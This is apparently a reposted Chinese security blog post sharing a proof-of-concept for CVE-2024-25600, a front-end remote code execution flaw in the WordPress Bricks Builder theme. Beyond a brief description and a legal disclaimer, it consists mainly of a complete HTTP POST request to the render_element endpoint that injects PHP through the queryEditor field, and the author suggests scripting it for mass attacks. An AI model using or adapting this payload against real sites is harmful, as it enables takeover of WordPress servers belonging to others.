WordPres Bricks Builder 前台RCE(CVE-2024-25600)

admin 2024年2月23日18:57:08评论33 views字数 664阅读2分12秒阅读模式

声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!

毫无营养poc的分享这种建议加入脚本遇到批量打就可能都存在。

WordPres 默认配置安装的 Brick Builder 主题在低于<= 1.9.6版本中存在远程代码执行漏洞。

获取 nonce 值。

WordPres Bricks Builder 前台RCE(CVE-2024-25600)

POST /wp-json/bricks/v1/render_element HTTP/1.1Host: balalanengliangUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: */*Content-Type: application/json{  "postId": "1",  "nonce": "获取到的值",  "element": {    "name": "container",    "settings": {      "hasLoop": "true",      "query": {        "useQueryEditor": true,        "queryEditor": "throw new Exception(`fuck?`);",        "objectType": "post"      }    }  }}

原文始发于微信公众号(滑板人之家):WordPres Bricks Builder 前台RCE(CVE-2024-25600)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日18:57:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WordPres Bricks Builder 前台RCE(CVE-2024-25600)https://cn-sec.com/archives/2519499.html

发表评论

匿名网友 填写信息